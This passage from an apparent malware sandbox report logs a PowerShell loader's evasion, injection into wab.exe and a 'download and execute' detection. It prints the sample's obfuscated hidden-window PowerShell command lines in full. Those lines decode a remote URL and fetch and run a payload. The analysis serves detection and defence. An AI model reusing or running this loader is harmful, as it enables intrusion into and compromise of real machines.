              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 3270000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 25F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 25E50000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4111Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5792Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6684Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3010Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 6134Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3697Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 6684 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 3010 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7688Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7688Thread sleep time: -29514790517935264s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2504Thread sleep count: 6134 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2504Thread sleep count: 3697 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: powershell.exe, 00000002.00000002.2641655251.00000204731EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWLo%SystemRoot%\system32\mswsock.dllenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;OO1
              Source: wab.exe, 0000000A.00000002.2907942536.000000000A56E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7488.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7488, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7744, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4500000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327F950Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$monostelous = 1;$fomented='sub';$fomented+='strin';$fomented+='g';function upstair91($contrive){$noontide=$contrive.length-$monostelous;for($bortskaffelsesmetode=5;$bortskaffelsesmetode -lt $noontide;$bortskaffelsesmetode+=6){$savnes+=$contrive.$fomented.invoke( $bortskaffelsesmetode, $monostelous);}$savnes;}function skizoide($cheanne){.($scrimshorn) ($cheanne);}$lagenens=upstair91 'autommskvisosamoazbi.elinuclelmis ilsla,ea.vern/vek.e5unmag. inf 0 aaha spade(unrelw im eitatusnek,pedtilkeotrykkwiconos gumm vent.n villtation outse1 efte0 numm.,hoog0 nabo;skrot ukyndwcheirip.ddenrokad6 unde4diara;nanny hus.exselvg6bikse4konsu;dagso kor.fr ego v ripo:helul1 lau2overn1perio. hove0genre) ,ugt replgremnfecor.ecpre,oknonvaoafpas/myste2diaer0lre r1trich0svanh0pauci1condu0op.ak1,elss semitf oilsi,asserlu.thepriesf uoplolittex g.de/snr l1 caud2,hole1 .pre. lobb0savou ';$unrevengingly166=upstair91 'peepiu fl es,ndiseperv r pins- al,oaapprigspadeefil,nngenavtnonfe ';$stot=upstair91 'ren rhbevistkedeltniellpfortrsfotom:selvh/ acke/bjergwfilbew.oncowbilla.ov rss sisaesamarnrefride melsndvenpstimea sangc bukse bes,.tempeccero,opizzimmaste/benaapkviltrstangofluff/appoidprocelprint/va ut5tet amcirku5opsprareset1solfauop ys ';$detonate=upstair91 ',nthr>opbev ';$scrimshorn=upstair91 'latkeis.igpe ballxkompr ';$pelagia123='tordnes';$udpressede = upstair91 'cireretredic staihsvrscometr. filmm%vildka a,phplill,pestradr,misapersptmanu.ainter%bre,s\restibgenn,eekseklvold esoogeju,draredg,mifolkenskorsgst.nds punctlope.iinduslbacitshenhrtunde.akrgebn bigfdfarvee .opon nomie kontstyvep.sammeu turbn ta zjveggi appli&r.dio&udlov fiksedrypncuforuh coinoande. te,rt,fslu ';skizoide (upstair91 ' ba d$hon.rg peril .outo gebrbsulfoa udsklsypho:kunnesrigsbk,intersynkats,emme m skr .ueleflagegbiliniinform moopecinchnhovedtd trse semitrnereslandi=arbe,(su,recreflemthinodtj.ne medit/spkhucta.ul amtsk$s adsugrabbd helspw,ener rentedickysfloriss gareelderd etlyel,ane)maler ');skizoide (upstair91 'ra,le$sabelg forslsloppo ge sbko.teagrae,l trac:spredbo.rejetautnsiliadtrumvgrm risesam enstyrtdefterecrowdsuropf=vnget$gr gestvangtsm leoban.stblo.s.poulis phalpgrimrld,visidebittkamuf(chest$l.ciddadelselydentmatteocamern rackasammetsiklie page) redo ');$stot=$bestrendes[0];$songtress= (upstair91 'fri b$ stegglaansllimitostd ubinitiagroenlaande: skaks ,carpdundye musocbi,tekvaretl favoecovendpayba= for,nselvmeenkepwlyrik-seksto d,ukb.ommajtubuleexci.corigitbandl rouleshj.teyrendes klbetvaasee istimsecco.virginoddf eforhit jagg. oitfwtiltueshakeb refrcprocelterm,ijassiestrafnun.ott');$songtress+=$skrteregimentets[1];skizoide ($songtress);skizoide (upstair91 'inca.$ stinsovervpcarboephiltca.sinkbo.bll.aveteknackdewder.polishhalvmele inabije,dshik,e olyr tagms blg [visc $ ludhufhovenpy,pnrkole erejsevzooloeephebnhomilgud.kiire,hinme epgu.homlfodb,ybarog1cepha6wolfe6ru,tp] pen,=hom g$vol,mlcl,quav
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$monostelous = 1;$fomented='sub';$fomented+='strin';$fomented+='g';function upstair91($contrive){$noontide=$contrive.length-$monostelous;for($bortskaffelsesmetode=5;$bortskaffelsesmetode -lt $noontide;$bortskaffelsesmetode+=6){$savnes+=$contrive.$fomented.invoke( $bortskaffelsesmetode, $monostelous);}$savnes;}function skizoide($cheanne){.($scrimshorn) ($cheanne);}$lagenens=upstair91 'autommskvisosamoazbi.elinuclelmis ilsla,ea.vern/vek.e5unmag. inf 0 aaha spade(unrelw im eitatusnek,pedtilkeotrykkwiconos gumm vent.n villtation outse1 efte0 numm.,hoog0 nabo;skrot ukyndwcheirip.ddenrokad6 unde4diara;nanny hus.exselvg6bikse4konsu;dagso kor.fr ego v ripo:helul1 lau2overn1perio. hove0genre) ,ugt replgremnfecor.ecpre,oknonvaoafpas/myste2diaer0lre r1trich0svanh0pauci1condu0op.ak1,elss semitf oilsi,asserlu.thepriesf uoplolittex g.de/snr l1 caud2,hole1 .pre. lobb0savou ';$unrevengingly166=upstair91 'peepiu fl es,ndiseperv r pins- al,oaapprigspadeefil,nngenavtnonfe ';$stot=upstair91 'ren rhbevistkedeltniellpfortrsfotom:selvh/ acke/bjergwfilbew.oncowbilla.ov rss sisaesamarnrefride melsndvenpstimea sangc bukse bes,.tempeccero,opizzimmaste/benaapkviltrstangofluff/appoidprocelprint/va ut5tet amcirku5opsprareset1solfauop ys ';$detonate=upstair91 ',nthr>opbev ';$scrimshorn=upstair91 'latkeis.igpe ballxkompr ';$pelagia123='tordnes';$udpressede = upstair91 'cireretredic staihsvrscometr. filmm%vildka a,phplill,pestradr,misapersptmanu.ainter%bre,s\restibgenn,eekseklvold esoogeju,draredg,mifolkenskorsgst.nds punctlope.iinduslbacitshenhrtunde.akrgebn bigfdfarvee .opon nomie kontstyvep.sammeu turbn ta zjveggi appli&r.dio&udlov fiksedrypncuforuh coinoande. te,rt,fslu ';skizoide (upstair91 ' ba d$hon.rg peril .outo gebrbsulfoa udsklsypho:kunnesrigsbk,intersynkats,emme m skr .ueleflagegbiliniinform moopecinchnhovedtd trse semitrnereslandi=arbe,(su,recreflemthinodtj.ne medit/spkhucta.ul amtsk$s adsugrabbd helspw,ener rentedickysfloriss gareelderd etlyel,ane)maler ');skizoide (upstair91 'ra,le$sabelg forslsloppo ge sbko.teagrae,l trac:spredbo.rejetautnsiliadtrumvgrm risesam enstyrtdefterecrowdsuropf=vnget$gr gestvangtsm leoban.stblo.s.poulis phalpgrimrld,visidebittkamuf(chest$l.ciddadelselydentmatteocamern rackasammetsiklie page) redo ');$stot=$bestrendes[0];$songtress= (upstair91 'fri b$ stegglaansllimitostd ubinitiagroenlaande: skaks ,carpdundye musocbi,tekvaretl favoecovendpayba= for,nselvmeenkepwlyrik-seksto 